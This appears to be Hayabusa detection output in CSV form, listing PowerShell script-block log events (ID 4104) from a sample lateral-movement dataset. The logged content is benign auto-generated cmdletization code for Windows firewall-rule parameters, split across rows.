[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { 
[object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParam,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,eter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false 
if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = 